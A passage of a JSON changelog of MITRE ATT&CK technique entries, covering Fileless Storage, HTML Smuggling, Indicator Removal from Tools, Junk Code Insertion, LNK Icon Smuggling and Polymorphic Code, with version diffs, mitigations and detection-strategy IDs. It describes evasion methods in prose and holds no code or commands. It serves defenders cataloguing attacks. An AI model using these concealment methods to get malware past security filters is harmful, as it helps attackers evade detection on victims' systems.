nowrap=\"nowrap\">s&nbsp;are&nbsp;mapped&nbsp;directly&nbsp;to&nbsp;RAM&nbsp;and&nbsp;not&nbsp;stored&nbsp;on&nbsp;the&nbsp;disk.(Cit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;Elastic&nbsp;Binary&nbsp;Executed&nbsp;from&nbsp;Shared&nbsp;Memory&nbsp;Directory)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;Elastic&nbsp;Binary&nbsp;Executed&nbsp;from&nbsp;Shared&nbsp;Memory&nbsp;Directory)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(Citation:&nbsp;Akami&nbsp;Frog4Shell&nbsp;2024)(Citation:&nbsp;Aquasec&nbsp;Muhstik&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(Citation:&nbsp;Akami&nbsp;Frog4Shell&nbsp;2024)(Citation:&nbsp;Aquasec&nbsp;Muhstik&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Malware&nbsp;2024)(Citation:&nbsp;Bitsight&nbsp;7777&nbsp;Botnet)(Citation:&nbsp;CISC</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Malware&nbsp;2024)(Citation:&nbsp;Bitsight&nbsp;7777&nbsp;Botnet)(Citation:&nbsp;CISC</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">O&nbsp;Nexus&nbsp;900&nbsp;Config).&nbsp;&nbsp;Similar&nbsp;to&nbsp;fileless&nbsp;in-memory&nbsp;behavior</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">O&nbsp;Nexus&nbsp;900&nbsp;Config).&nbsp;&nbsp;Similar&nbsp;to&nbsp;fileless&nbsp;in-memory&nbsp;behavior</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;such&nbsp;as&nbsp;[Reflective&nbsp;Code&nbsp;Loading](https://attack.mitre.org</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;such&nbsp;as&nbsp;[Reflective&nbsp;Code&nbsp;Loading](https://attack.mitre.org</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/techniques/T1620)&nbsp;and&nbsp;[Process&nbsp;Injection](https://attack.mi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/techniques/T1620)&nbsp;and&nbsp;[Process&nbsp;Injection](https://attack.mi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tre.org/techniques/T1055),&nbsp;fileless&nbsp;data&nbsp;storage&nbsp;may&nbsp;remain&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tre.org/techniques/T1055),&nbsp;fileless&nbsp;data&nbsp;storage&nbsp;may&nbsp;remain&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">undetected&nbsp;by&nbsp;anti-<span class=\"diff_chg\">virus&nbsp;and&nbsp;other&nbsp;endpoint&nbsp;security&nbsp;tools&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">undetected&nbsp;by&nbsp;anti<span class=\"diff_add\">virus&nbsp;and&nbsp;other&nbsp;endpoint&nbsp;security&nbsp;tools&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">hat&nbsp;can&nbsp;only&nbsp;access&nbsp;specific&nbsp;file&nbsp;formats&nbsp;from&nbsp;disk&nbsp;storage.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">at&nbsp;can&nbsp;only&nbsp;access&nbsp;specific&nbsp;file&nbsp;formats&nbsp;from&nbsp;disk&nbsp;storage.&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">&nbsp;Leveraging&nbsp;fileless&nbsp;storage&nbsp;may&nbsp;also&nbsp;allow&nbsp;adversaries&nbsp;to&nbsp;b</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">Leveraging&nbsp;fileless&nbsp;storage&nbsp;may&nbsp;also&nbsp;allow&nbsp;adversaries&nbsp;to&nbsp;by</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">ypass&nbsp;the&nbsp;protections&nbsp;offered&nbsp;by&nbsp;read-only&nbsp;file&nbsp;systems&nbsp;in</span>&nbsp;L</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pass&nbsp;the&nbsp;protections&nbsp;offered&nbsp;by&nbsp;read</span>-<span class=\"diff_chg\">only&nbsp;file&nbsp;systems&nbsp;in</span>&nbsp;Li</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">inux.(Citation:&nbsp;Sysdig&nbsp;Fileless&nbsp;Malware&nbsp;23022)&nbsp;&nbsp;Adversaries&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nux.(Citation:&nbsp;Sysdig&nbsp;Fileless&nbsp;Malware&nbsp;23022)&nbsp;&nbsp;Adversaries&nbsp;m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">may&nbsp;use&nbsp;fileless&nbsp;storage&nbsp;to&nbsp;conceal&nbsp;various&nbsp;types&nbsp;of&nbsp;stored&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ay&nbsp;use&nbsp;fileless&nbsp;storage&nbsp;to&nbsp;conceal&nbsp;various&nbsp;types&nbsp;of&nbsp;stored&nbsp;d</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">data,&nbsp;including&nbsp;payloads/shellcode&nbsp;(potentially&nbsp;being&nbsp;used&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ata,&nbsp;including&nbsp;payloads/shellcode&nbsp;(potentially&nbsp;being&nbsp;used&nbsp;as</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;part&nbsp;of&nbsp;[Persistence](https://attack.mitre.org/tactics/TA0</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;part&nbsp;of&nbsp;[Persistence](https://attack.mitre.org/tactics/TA00</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">003))&nbsp;and&nbsp;collected&nbsp;data&nbsp;not&nbsp;yet&nbsp;exfiltrated&nbsp;from&nbsp;the&nbsp;victim</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">03))&nbsp;and&nbsp;collected&nbsp;data&nbsp;not&nbsp;yet&nbsp;exfiltrated&nbsp;from&nbsp;the&nbsp;victim&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;(e.g.,&nbsp;[Local&nbsp;Data&nbsp;Staging](https://attack.mitre.org/techni</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(e.g.,&nbsp;[Local&nbsp;Data&nbsp;Staging](https://attack.mitre.org/techniq</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ques/T1074/001)).&nbsp;Adversaries&nbsp;also&nbsp;often&nbsp;encrypt,&nbsp;encode,&nbsp;sp</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ues/T1074/001)).&nbsp;Adversaries&nbsp;also&nbsp;often&nbsp;encrypt,&nbsp;encode,&nbsp;spl</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lice,&nbsp;or&nbsp;otherwise&nbsp;obfuscate&nbsp;this&nbsp;fileless&nbsp;data&nbsp;when&nbsp;stored.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ice,&nbsp;or&nbsp;otherwise&nbsp;obfuscate&nbsp;this&nbsp;fileless&nbsp;data&nbsp;when&nbsp;stored.&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;&nbsp;&nbsp;Some&nbsp;forms&nbsp;of&nbsp;fileless&nbsp;storage&nbsp;activity&nbsp;may&nbsp;indirectly&nbsp;cr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;&nbsp;Some&nbsp;forms&nbsp;of&nbsp;fileless&nbsp;storage&nbsp;activity&nbsp;may&nbsp;indirectly&nbsp;cre</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eate&nbsp;artifacts&nbsp;in&nbsp;the&nbsp;file&nbsp;system,&nbsp;but&nbsp;in&nbsp;central&nbsp;and&nbsp;otherw</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ate&nbsp;artifacts&nbsp;in&nbsp;the&nbsp;file&nbsp;system,&nbsp;but&nbsp;in&nbsp;central&nbsp;and&nbsp;otherwi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ise&nbsp;difficult&nbsp;to&nbsp;inspect&nbsp;formats&nbsp;such&nbsp;as&nbsp;the&nbsp;WMI&nbsp;(e.g.,&nbsp;`%Sy</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">se&nbsp;difficult&nbsp;to&nbsp;inspect&nbsp;formats&nbsp;such&nbsp;as&nbsp;the&nbsp;WMI&nbsp;(e.g.,&nbsp;`%Sys</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">stemRoot%\\System32\\Wbem\\Repository`)&nbsp;or&nbsp;Registry&nbsp;(e.g.,&nbsp;`%Sy</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">temRoot%\\System32\\Wbem\\Repository`)&nbsp;or&nbsp;Registry&nbsp;(e.g.,&nbsp;`%Sys</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">stemRoot%\\System32\\Config`)&nbsp;physical&nbsp;files.(Citation:&nbsp;Micros</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">temRoot%\\System32\\Config`)&nbsp;physical&nbsp;files.(Citation:&nbsp;Microso</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oft&nbsp;Fileless)&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ft&nbsp;Fileless)&nbsp;</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0344: Detection Strategy for Fileless Storage via Registry, WMI, and Shared Memory"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-05-20 12:20:42.219000+00:00",
                    "modified": "2026-04-15 22:19:27.839000+00:00",
                    "name": "HTML Smuggling",
                    "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)\n\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.\n\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/006",
                            "external_id": "T1027.006"
                        },
                        {
                            "source_name": "Outlflank HTML Smuggling 2018",
                            "description": "Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021.",
                            "url": "https://outflank.nl/blog/2018/08/14/html-smuggling-explained/"
                        },
                        {
                            "source_name": "MSTIC NOBELIUM May 2021",
                            "description": "Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.",
                            "url": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
                        },
                        {
                            "source_name": "HTML Smuggling Menlo Security 2020",
                            "description": "Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021.",
                            "url": "https://www.menlosecurity.com/blog/new-attack-alert-duri"
                        },
                        {
                            "source_name": "nccgroup Smuggling HTA 2017",
                            "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved September 12, 2024.",
                            "url": "https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jonathan Boucher, @crash_wave, Bank of Canada",
                        "Krishnan Subramanian, @krish203",
                        "Stan Hegt, Outflank",
                        "Vinay Pidathala"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:19:27.839000+00:00\", \"old_value\": \"2025-10-24 17:49:27.501000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1048: Application Isolation and Sandboxing"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0313: Detection Strategy for HTML Smuggling via JavaScript Blob + Dynamic File Drop"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-19 21:27:32.820000+00:00",
                    "modified": "2026-04-15 22:19:28.558000+00:00",
                    "name": "Indicator Removal from Tools",
                    "description": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/005",
                            "external_id": "T1027.005"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:19:28.558000+00:00\", \"old_value\": \"2025-10-24 17:49:13.906000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0189: Detection Strategy for Indicator Removal from Tools - Post-AV Evasion Modification"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--671cd17f-a765-48fd-adc4-dad1941b1ae3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-03-04 21:38:49.913000+00:00",
                    "modified": "2026-04-15 22:19:48.489000+00:00",
                    "name": "Junk Code Insertion",
                    "description": "Adversaries may use junk code / dead code to obfuscate a malware\u2019s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with [Compression](https://attack.mitre.org/techniques/T1027/015) or [Software Packing](https://attack.mitre.org/techniques/T1027/002).(Citation: ReasonLabs)(Citation: ReasonLabs Cyberpedia Junk Code)\n\nNo-Operation (NOP) instructions are an example of dead code commonly used in x86 assembly language. They are commonly used as the 0x90 opcode. When NOPs are added to malware, the disassembler may show the NOP instructions, leading to the analyst needing to step through them.(Citation: ReasonLabs)\n\nThe use of junk / dead code insertion is distinct from [Binary Padding](https://attack.mitre.org/techniques/T1027/001) because the purpose is to obfuscate the functionality of the code, rather than simply to change the malware\u2019s signature.   ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/016",
                            "external_id": "T1027.016"
                        },
                        {
                            "source_name": "ReasonLabs",
                            "description": "ReasonLabs. (n.d.). What is Dead code insertion?. Retrieved March 4, 2025.",
                            "url": "https://cyberpedia.reasonlabs.com/EN/dead%20code%20insertion.html"
                        },
                        {
                            "source_name": "ReasonLabs Cyberpedia Junk Code",
                            "description": "What is Junk Code?. (n.d.). ReasonLabs. Retrieved April 4, 2025.",
                            "url": "https://cyberpedia.reasonlabs.com/EN/junk%20code.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Joas Antonio dos Santos, @C0d3Cr4zy"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:19:48.489000+00:00\", \"old_value\": \"2025-04-15 19:58:37.495000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0322: Detection Strategy for Junk Code Obfuscation with Suspicious Execution Patterns"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-09-29 15:28:42.409000+00:00",
                    "modified": "2026-04-15 22:20:54.005000+00:00",
                    "name": "LNK Icon Smuggling",
                    "description": "Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory. \n\nAdversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://attack.mitre.org/techniques/T1204/002)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)/[System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218) arguments within the target path field of the LNK.(Citation: Unprotect Shortcut)(Citation: Booby Trap Shortcut 2017)\n\nLNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads. \n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/012",
                            "external_id": "T1027.012"
                        },
                        {
                            "source_name": "Unprotect Shortcut",
                            "description": "Unprotect Project. (2019, March 18). Shortcut Hiding. Retrieved October 3, 2023.",
                            "url": "https://unprotect.it/technique/shortcut-hiding/"
                        },
                        {
                            "source_name": "Booby Trap Shortcut 2017",
                            "description": "Weyne, F. (2017, April). Booby trap a shortcut with a backdoor. Retrieved October 3, 2023.",
                            "url": "https://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Michael Raggi @aRtAGGI",
                        "Andrew Northern, @ex_raritas",
                        "Gregory Lesnewich, @greglesnewich"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:20:54.005000+00:00\", \"old_value\": \"2025-10-24 17:49:04.385000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\", \"old_value\": \"https://www.uperesia.com/booby-trapped-shortcut\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint",
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0405: Detection Strategy for LNK Icon Smuggling"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-09-27 12:28:03.938000+00:00",
                    "modified": "2026-04-15 22:20:58.199000+00:00",
                    "name": "Polymorphic Code",
                    "description": "Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing its runtime footprint during code execution.(Citation: polymorphic-blackberry) With each execution of the software, the code is mutated into a different version of itself that achieves the same purpose or objective as the original. This functionality enables the malware to evade traditional signature-based defenses, such as antivirus and antimalware tools.(Citation: polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction with polymorphic code to accomplish the intended effects, including using mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation: polymorphic-medium)\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/014",
                            "external_id": "T1027.014"
                        },
                        {
                            "source_name": "polymorphic-blackberry",
                            "description": "Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September 27, 2024.",
                            "url": "https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware"
                        },
                        {
                            "source_name": "polymorphic-sentinelone",
                            "description": "SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples and Challenges. Retrieved September 27, 2024.",
                            "url": "https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware"
                        },
                        {
                            "source_name": "polymorphic-medium",
                            "description": "Shellseekercyber. (2024, January 7). Explainer: Packed Malware. Retrieved September 27, 2024.",
                            "url": "https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035"
                        },
                        {
                            "source_name": "polymorphic-linkedin",
                            "description": "Sherwin Akshay. (2024, May 28). Techniques for concealing malware and hindering analysis: Packing up and unpacking stuff. Retrieved September 27, 2024.",
                            "url": "https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "TruKno",
